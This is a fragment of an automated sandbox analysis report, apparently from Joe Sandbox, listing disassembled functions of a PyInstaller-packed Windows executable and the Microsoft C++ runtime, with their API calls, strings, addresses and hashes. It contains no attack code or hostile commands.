PyErr_Fetch, xrefs: 00007FF72B8D5ACF, 00007FF72B8D5AF1
PyConfig_SetString, xrefs: 00007FF72B8D5A45, 00007FF72B8D5A67
Py_IsInitialized, xrefs: 00007FF72B8D5931, 00007FF72B8D5953
PyImport_ExecCodeModule, xrefs: 00007FF72B8D5C11, 00007FF72B8D5C33
PyEval_EvalCode, xrefs: 00007FF72B8D5BB5, 00007FF72B8D5BD7
PyUnicode_Replace, xrefs: 00007FF72B8D5FD7, 00007FF72B8D5FF9
PyUnicode_Decode, xrefs: 00007FF72B8D5EF1, 00007FF72B8D5F13
PyMarshal_ReadObjectFromString, xrefs: 00007FF72B8D5C6D, 00007FF72B8D5C8F
PyConfig_SetBytesString, xrefs: 00007FF72B8D5A17, 00007FF72B8D5A39
PyMem_RawFree, xrefs: 00007FF72B8D5C9B, 00007FF72B8D5CBD
PyImport_AddModule, xrefs: 00007FF72B8D5BE3, 00007FF72B8D5C05
PyImport_ImportModule, xrefs: 00007FF72B8D5C3F, 00007FF72B8D5C61
Py_InitializeFromConfig, xrefs: 00007FF72B8D5903, 00007FF72B8D5925
GetProcAddress, xrefs: 00007FF72B8D5868
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF72B8D5DDD, 00007FF72B8D5DFF
Py_PreInitialize, xrefs: 00007FF72B8D595F, 00007FF72B8D5981
PyUnicode_AsUTF8, xrefs: 00007FF72B8D5EC3, 00007FF72B8D5EE5
PyRun_SimpleStringFlags, xrefs: 00007FF72B8D5E0B, 00007FF72B8D5E2D
PyUnicode_FromString, xrefs: 00007FF72B8D5F7B, 00007FF72B8D5F9D
Failed to get address for %hs, xrefs: 00007FF72B8D5861
Py_Finalize, xrefs: 00007FF72B8D58D5, 00007FF72B8D58F7
PyErr_Print, xrefs: 00007FF72B8D5B59, 00007FF72B8D5B7B
Py_DecodeLocale, xrefs: 00007FF72B8D587F, 00007FF72B8D58A1
PyObject_CallFunction, xrefs: 00007FF72B8D5CF7, 00007FF72B8D5D19
PyErr_Occurred, xrefs: 00007FF72B8D5B2B, 00007FF72B8D5B4D

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction ID: bf6f4a30141ebada8e2513b71b201af37f4357c0f9e019f39df34de048ed5f15
Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction Fuzzy Hash: 4922A264A09B07D1FA15FB6DAC505B5A2A0EF68781FC41036C95E02671FF3CB6689FB0

Function 00007FF72B8D76C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF72B8D76D7
GetLastError.KERNEL32 ref: 00007FF72B8D76E9
GetProcAddress.KERNEL32 ref: 00007FF72B8D7725
GetLastError.KERNEL32 ref: 00007FF72B8D7737
GetProcAddress.KERNEL32 ref: 00007FF72B8D7750
GetLastError.KERNEL32 ref: 00007FF72B8D7762
GetProcAddress.KERNEL32 ref: 00007FF72B8D777B
GetLastError.KERNEL32 ref: 00007FF72B8D778D
GetProcAddress.KERNEL32 ref: 00007FF72B8D77A9
GetLastError.KERNEL32 ref: 00007FF72B8D77BB
GetProcAddress.KERNEL32 ref: 00007FF72B8D77D7
GetLastError.KERNEL32 ref: 00007FF72B8D77E9
GetProcAddress.KERNEL32 ref: 00007FF72B8D7805
GetLastError.KERNEL32 ref: 00007FF72B8D7817
GetProcAddress.KERNEL32 ref: 00007FF72B8D7833
GetLastError.KERNEL32 ref: 00007FF72B8D7845
GetProcAddress.KERNEL32 ref: 00007FF72B8D7861
GetLastError.KERNEL32 ref: 00007FF72B8D7873

Strings

Tcl_MutexUnlock, xrefs: 00007FF72B8D78E1, 00007FF72B8D7903
Tcl_ConditionWait, xrefs: 00007FF72B8D7999, 00007FF72B8D79BB
Tk_GetNumMainWindows, xrefs: 00007FF72B8D7CA7, 00007FF72B8D7CC9
Tcl_FinalizeThread, xrefs: 00007FF72B8D77CD, 00007FF72B8D77EF
Tcl_EvalEx, xrefs: 00007FF72B8D7BC1, 00007FF72B8D7BE3
Tcl_GetVar2, xrefs: 00007FF72B8D7A23, 00007FF72B8D7A45
Tcl_Free, xrefs: 00007FF72B8D7C4B, 00007FF72B8D7C6D
Tcl_GetString, xrefs: 00007FF72B8D7AAD, 00007FF72B8D7ACF
Tcl_ConditionNotify, xrefs: 00007FF72B8D796B, 00007FF72B8D798D
Tcl_CreateThread, xrefs: 00007FF72B8D7829, 00007FF72B8D784B
Tk_Init, xrefs: 00007FF72B8D7C79, 00007FF72B8D7C9B
Tcl_GetObjResult, xrefs: 00007FF72B8D7B65, 00007FF72B8D7B87
Tcl_Init, xrefs: 00007FF72B8D76D0, 00007FF72B8D76EF
Tcl_ConditionFinalize, xrefs: 00007FF72B8D793D, 00007FF72B8D795F
Tcl_ThreadQueueEvent, xrefs: 00007FF72B8D79C7, 00007FF72B8D79E9
Tcl_ThreadAlert, xrefs: 00007FF72B8D79F5, 00007FF72B8D7A17
Tcl_Finalize, xrefs: 00007FF72B8D779F, 00007FF72B8D77C1
Tcl_JoinThread, xrefs: 00007FF72B8D7885, 00007FF72B8D78A7
Tcl_NewByteArrayObj, xrefs: 00007FF72B8D7B09, 00007FF72B8D7B2B
Tcl_DeleteInterp, xrefs: 00007FF72B8D77FB, 00007FF72B8D781D
GetProcAddress, xrefs: 00007FF72B8D76FF
Tcl_MutexLock, xrefs: 00007FF72B8D78B3, 00007FF72B8D78D5
Tcl_NewStringObj, xrefs: 00007FF72B8D7ADB, 00007FF72B8D7AFD
Tcl_EvalObjv, xrefs: 00007FF72B8D7BEF, 00007FF72B8D7C11
Tcl_CreateObjCommand, xrefs: 00007FF72B8D7A7F, 00007FF72B8D7AA1
Tcl_EvalFile, xrefs: 00007FF72B8D7B93, 00007FF72B8D7BB5
Tcl_CreateInterp, xrefs: 00007FF72B8D771B, 00007FF72B8D773D
Tcl_SetVar2Ex, xrefs: 00007FF72B8D7B37, 00007FF72B8D7B59
Tcl_SetVar2, xrefs: 00007FF72B8D7A51, 00007FF72B8D7A73
Tcl_MutexFinalize, xrefs: 00007FF72B8D790F, 00007FF72B8D7931
Failed to get address for %hs, xrefs: 00007FF72B8D76F8
Tcl_FindExecutable, xrefs: 00007FF72B8D7746, 00007FF72B8D7768
Tcl_DoOneEvent, xrefs: 00007FF72B8D7771, 00007FF72B8D7793
Tcl_Alloc, xrefs: 00007FF72B8D7C1D, 00007FF72B8D7C3F
Tcl_GetCurrentThread, xrefs: 00007FF72B8D7857, 00007FF72B8D7879

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction ID: 808aae6252432a3a7dbb1ef1fb63fbacc1bcfae0b2788b235ad592e946f0c808
Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction Fuzzy Hash: 8602A324E09B07D1EA15BB6DAC505B4A3A1EFA8745FD41032D96E02270FF3CB569DBB0

Function 00007FF8BA248F04 Relevance: 58.1, APIs: 4, Strings: 29, Instructions: 382COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA249475
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA2494AA
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA2494E3

Strings

const, xrefs: 00007FF8BA2492D3
volatile, xrefs: 00007FF8BA24931B
__int8, xrefs: 00007FF8BA24911E
__w64 , xrefs: 00007FF8BA249148
decltype(auto), xrefs: 00007FF8BA24934C
char8_t, xrefs: 00007FF8BA249225
wchar_t, xrefs: 00007FF8BA249396
short, xrefs: 00007FF8BA248FC2
char, xrefs: 00007FF8BA248FD4
long , xrefs: 00007FF8BA249013
__int64, xrefs: 00007FF8BA2491AB
auto, xrefs: 00007FF8BA249237
float, xrefs: 00007FF8BA249056
int, xrefs: 00007FF8BA248FB0
void, xrefs: 00007FF8BA249068
volatile, xrefs: 00007FF8BA2492EE
__int32, xrefs: 00007FF8BA2491BA
double, xrefs: 00007FF8BA24902A
long, xrefs: 00007FF8BA248F9E
UNKNOWN, xrefs: 00007FF8BA249378
char32_t, xrefs: 00007FF8BA2493F7
this , xrefs: 00007FF8BA2493BD
signed , xrefs: 00007FF8BA249442
<unknown>, xrefs: 00007FF8BA249216
__int128, xrefs: 00007FF8BA24919C
char16_t, xrefs: 00007FF8BA249204
bool, xrefs: 00007FF8BA2491CC
__int16, xrefs: 00007FF8BA24910C
unsigned , xrefs: 00007FF8BA249432

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Name::operator+
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
API String ID: 2943138195-1482988683
Opcode ID: fe645fa0cf9fb8fb38c7106db32793c54410b780dee10ccae4a95b5c2ef7be77
Instruction ID: ee7428acb4c2aad7cb5babc8636c505b08d17fabff448953830931be99adb853
Opcode Fuzzy Hash: fe645fa0cf9fb8fb38c7106db32793c54410b780dee10ccae4a95b5c2ef7be77
Instruction Fuzzy Hash: 9A025A72E1861398FB24CB6CD8951BC2AB0BB05BC4F5051B9CF0D16AA9DF3DE545E780

Function 00007FF8BA24C7AC Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 289COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C83D
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C876
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C94A
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C95B
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C9BF
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C9CF
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24CA1B
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24CA2D
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24CBA2

Part of subcall function 00007FF8BA24E728: Replicator::operator[].LIBVCRUNTIME ref: 00007FF8BA24E782

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24CC24
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24CC33

Strings

`anonymous namespace', xrefs: 00007FF8BA24CAFF

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Name::operator+$Replicator::operator[]
String ID: `anonymous namespace'
API String ID: 3863519203-3062148218
Opcode ID: b6c8833087229f8ff0d58364892c90fb28097fc250b0c2ab6d56ce5395c29493
Instruction ID: 302a4e4bb246292c31cb8566cf77a43d35221e2036d7d5feafa75ebecacce480
Opcode Fuzzy Hash: b6c8833087229f8ff0d58364892c90fb28097fc250b0c2ab6d56ce5395c29493
Instruction Fuzzy Hash: 97E15972A08B8299EB10CF2DE9801AD77A0FB44B88F4441B5EF9D17B59DF38E554E740

Function 00007FF72B8D81D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B8D9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B8D45F4,00000000,00007FF72B8D1985), ref: 00007FF72B8D93C9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF72B8D86B7,?,?,00000000,00007FF72B8D3CBB), ref: 00007FF72B8D822C

Part of subcall function 00007FF72B8D2810: MessageBoxW.USER32 ref: 00007FF72B8D28EA

Strings

LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF72B8D8203
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF72B8D82D9
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF72B8D829D
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF72B8D8373
%.*s, xrefs: 00007FF72B8D830C
CreateDirectory, xrefs: 00007FF72B8D837C
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF72B8D8240
\, xrefs: 00007FF72B8D8261

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
Instruction ID: 2d32c49e219293bdaf9922161c236abd7ee077774247c5db85b1eae413ab9730
Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
Instruction Fuzzy Hash: B1516511A28A8381FA55BB3DDC516B9E250EF94B80FC44432D64E466F5FE2CF5248FE0

Function 00007FF8BA24D5D0 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 359COMMONLIBRARYCODE

Download Yara Rule

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF8BA248B30), ref: 00007FF8BA24DA36
DName::DName.LIBVCRUNTIME ref: 00007FF8BA24DA75
swprintf_s.PGOCR ref: 00007FF8BA24DA95
DName::DName.LIBVCRUNTIME ref: 00007FF8BA24DAA5
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24DAF5

Strings

lambda, xrefs: 00007FF8BA24D994
NULL, xrefs: 00007FF8BA24D69D
nullptr, xrefs: 00007FF8BA24D7B9
`generic-class-parameter-, xrefs: 00007FF8BA24DB06
`generic-method-parameter-, xrefs: 00007FF8BA24DAC2
`template-type-parameter-, xrefs: 00007FF8BA24DB16

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: NameName::$Name::operator+atolswprintf_s
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
API String ID: 2331677841-2441609178
Opcode ID: 02cc3120799feeee523a6e31c5e8f77ede782e7b6fd9332275c3751b0d8d0444
Instruction ID: 4c26f95aab5d50c1d1ba9e0ebcecc2ae196b507195b6c5bef2aef481c41a5a0e
Opcode Fuzzy Hash: 02cc3120799feeee523a6e31c5e8f77ede782e7b6fd9332275c3751b0d8d0444
Instruction Fuzzy Hash: 15F17A32E1C65384FB299B6CCA941BC27A1BF45FC4F4401B6CF4E66A99DE3DA945E300

Function 00007FF72B8D1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON

Download Yara Rule

Strings

Failed to create symbolic link %s!, xrefs: 00007FF72B8D1622
fread, xrefs: 00007FF72B8D17E6
malloc, xrefs: 00007FF72B8D1749
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF72B8D17CA
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF72B8D17DF
fwrite, xrefs: 00007FF72B8D17D1
Failed to extract %s: failed to open archive file!, xrefs: 00007FF72B8D16A2
fopen, xrefs: 00007FF72B8D1663
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF72B8D1742
Failed to extract %s: failed to open target file!, xrefs: 00007FF72B8D165C
fseek, xrefs: 00007FF72B8D16E1
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF72B8D16DA

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 8a26c6b30a4a9dbbf0a67d668ca56ecab6de83d8edec6fcd9151379ae2812599
Instruction ID: f9aa253ff31f097a39ff7a706b0a844dd83a5a011c3ff1dd571196b4892575de
Opcode Fuzzy Hash: 8a26c6b30a4a9dbbf0a67d668ca56ecab6de83d8edec6fcd9151379ae2812599
Instruction Fuzzy Hash: E6517061B0864792EA10BB69DC005B9E350FF98B94FC44532EE4C477B6DE3CF5A58BA0

Function 00007FF8BA24AC60 Relevance: 19.9, APIs: 13, Instructions: 361COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24ACB1
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24AD7A
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24ADC3
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24ADD4

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 876faa57ff79795a5c1059d9e9be40cf01e694a924f5e3fff1249e01cfdef333
Instruction ID: 72fd44ec540d0c87b342eb911475915ff7b44b520359112dccbfa0a187b523db
Opcode Fuzzy Hash: 876faa57ff79795a5c1059d9e9be40cf01e694a924f5e3fff1249e01cfdef333
Instruction Fuzzy Hash: BAF15976B08A829AF710DF69D4901FC37B1BB04B8CB4444B6EF4D67A99DE38D519E380

Function 00007FF8BA242F14 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF8BA242F71

Part of subcall function 00007FF8BA2452D0: __GetUnwindTryBlock.LIBCMT ref: 00007FF8BA245313
Part of subcall function 00007FF8BA2452D0: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF8BA245338

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF8BA243049
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA243056
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF8BA2432A0
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA2432CE

Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA243394
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8BA2433C9

Strings

csm, xrefs: 00007FF8BA24306E
csm, xrefs: 00007FF8BA242F8B
csm, xrefs: 00007FF8BA242FF2

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 4223619315-393685449
Opcode ID: cfe6cce2b906701a9ac1d76f761d88fce5f408b5b6504f1d048e98039d5fa770
Instruction ID: c4f54b198fa3d7b20ee3217a27a5e051ddc08990df01306e60bacacd21a8e3f6
Opcode Fuzzy Hash: cfe6cce2b906701a9ac1d76f761d88fce5f408b5b6504f1d048e98039d5fa770
Instruction Fuzzy Hash: 83E17B72A08B428AEB20DB69D4402AD7BA4FB45FD8F101176EF8D57B99CF38E584D740

Function 00007FF8BA24E728 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 192COMMONLIBRARYCODE

Download Yara Rule

APIs

Replicator::operator[].LIBVCRUNTIME ref: 00007FF8BA24E782

Strings

template-parameter-, xrefs: 00007FF8BA24E7E4
`template-parameter-, xrefs: 00007FF8BA24E817
`generic-type-, xrefs: 00007FF8BA24E85E
generic-type-, xrefs: 00007FF8BA24E82B

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Replicator::operator[]
String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
API String ID: 3676697650-3207858774
Opcode ID: ffe630230d3b2de6161d53b0b22072a88b75348d547415f53f7225053af77ced
Instruction ID: 4806bec8be8083d14d15d9db17e1056c3f1ee37d640cba7b7f7348c2d5b21d55
Opcode Fuzzy Hash: ffe630230d3b2de6161d53b0b22072a88b75348d547415f53f7225053af77ced
Instruction Fuzzy Hash: 29918932A18A8799FB609F28D5402F837A1BB54B88F8841B2DF4D037A5DF3DE605E750

Function 00007FF72B8D2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF72B8D21AB
SelectObject.GDI32 ref: 00007FF72B8D21F2
DrawTextW.USER32 ref: 00007FF72B8D2215
SelectObject.GDI32 ref: 00007FF72B8D222B
ReleaseDC.USER32 ref: 00007FF72B8D223B
MoveWindow.USER32 ref: 00007FF72B8D228B
